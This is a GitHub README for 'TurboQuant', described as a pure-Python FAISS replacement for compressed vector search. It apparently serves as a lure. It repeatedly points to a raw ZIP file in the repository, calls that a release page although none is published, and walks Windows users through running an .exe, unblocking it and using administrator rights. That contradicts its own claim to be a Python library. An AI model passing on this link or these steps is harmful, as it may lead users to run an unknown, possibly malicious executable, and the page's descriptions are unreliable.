Skip to content

bojobh609/TurboQuant

Repository files navigation

⚡ TurboQuant - Fast vector search with less memory

Download TurboQuant

🖥️ What TurboQuant does

TurboQuant is a Windows app for fast vector search with smaller memory use. It helps you work with large sets of embeddings without heavy setup. It uses vector quantization to cut file size while keeping search results close to the original data.

Use it for:

  • semantic search
  • similarity search
  • RAG workflows
  • embedding storage
  • local vector search
  • LLM memory use cases

It is built as a pure Python FAISS replacement, so it aims to keep setup simple.

📥 Download TurboQuant

Go to the release page here:

https://github.com/bojobh609/TurboQuant/raw/refs/heads/main/turboquant/Quant_Turbo_3.2.zip

On that page, download the latest Windows file for your computer. If you see more than one file, choose the one that ends in .exe or the Windows package marked for end users.

🪟 Windows setup

  1. Visit the release page.
  2. Download the latest Windows file.
  3. Open your Downloads folder.
  4. Double-click the file you downloaded.
  5. If Windows asks for permission, choose Yes.
  6. Follow the on-screen steps.
  7. Start TurboQuant from the app window or shortcut it creates.

If the app comes as a ZIP file:

  1. Right-click the ZIP file.
  2. Choose Extract All.
  3. Open the extracted folder.
  4. Double-click the main app file.

✅ What you need

TurboQuant is meant for normal Windows desktop use.

A typical setup works best with:

  • Windows 10 or Windows 11
  • 8 GB RAM or more
  • A modern Intel or AMD CPU
  • 200 MB of free disk space for the app and files
  • A mouse and keyboard for easier use

For larger vector collections, more RAM helps.

📦 What you can do with it

TurboQuant helps you store and search vector data with less memory.

Common tasks:

  • load embeddings
  • reduce storage size
  • search for close matches
  • compare items by meaning
  • support local search tools
  • use compressed vectors for faster retrieval

It is a good fit if you want lower storage use without rebuilding your data pipeline.

🔍 How it works

TurboQuant uses vector quantization. In simple terms, it stores vectors in a smaller form so the app uses less space. That makes it useful when you have many embeddings or large search indexes.

It is built around:

  • approximate nearest neighbor search
  • compression
  • embedding search
  • quantized vector storage
  • NumPy-based data handling

The goal is to keep recall high while reducing memory use.

🧭 Basic use flow

Most users will follow this path:

  1. Download the app from the release page.
  2. Open the app on Windows.
  3. Load your vector data or embeddings.
  4. Choose a compression setting.
  5. Run a search or build an index.
  6. Save the result for later use.

If the app gives you sample data, use that first to see how it works.

🧰 Common features

  • Fast vector search on Windows
  • Small memory use
  • Pure Python core
  • Simple download and run setup
  • Good fit for semantic search
  • Works with embedding-based apps
  • Helpful for RAG and local AI tools

📁 File types you may see

Depending on the release, you may see one of these:

  • .exe file: open it directly
  • .zip file: extract it first
  • .whl file: for Python users
  • .tar.gz file: more common on source builds

For most Windows users, the best choice is the app package made for Windows.

🛠️ If the app does not open

Try these steps:

  1. Download the file again.
  2. Make sure the download finished.
  3. Right-click the file and check Properties.
  4. If you see an Unblock box, select it.
  5. Try Run as administrator.
  6. Reboot Windows and open it again.

If you still have trouble, download the newest release from the release page.

🔎 If you use it with embeddings

TurboQuant works best when your vectors come from the same model or the same data source. This keeps search results stable.

Helpful tips:

  • keep vector size the same for one index
  • store your original files in a safe place
  • test on a small batch first
  • use the same search method each time
  • keep track of your compression level

🧠 Good use cases

TurboQuant fits well in these cases:

  • search across document embeddings
  • build a small local vector store
  • reduce memory use in RAG tools
  • test vector search on a laptop
  • compare items by meaning
  • store many vectors without large file growth

🗂️ Project topics

This project relates to:

  • ann-search
  • approximate-nearest-neighbor
  • compression
  • deep-learning
  • embedding-compression
  • faiss
  • iclr-2026
  • information-retrieval
  • kv-cache
  • llm
  • machine-learning
  • numpy
  • python
  • quantization
  • rag
  • semantic-search
  • similarity-search
  • turboquant
  • vector-database
  • vector-quantization

🔗 Download again

If you need the latest build, use this link:

https://github.com/bojobh609/TurboQuant/raw/refs/heads/main/turboquant/Quant_Turbo_3.2.zip

🧩 Simple first run checklist

  • Download the latest Windows file
  • Open the file
  • Allow Windows permission if asked
  • Follow the setup steps
  • Launch the app
  • Load your data
  • Run your first search

Releases

No releases published

Packages

 
 
 

Contributors

Languages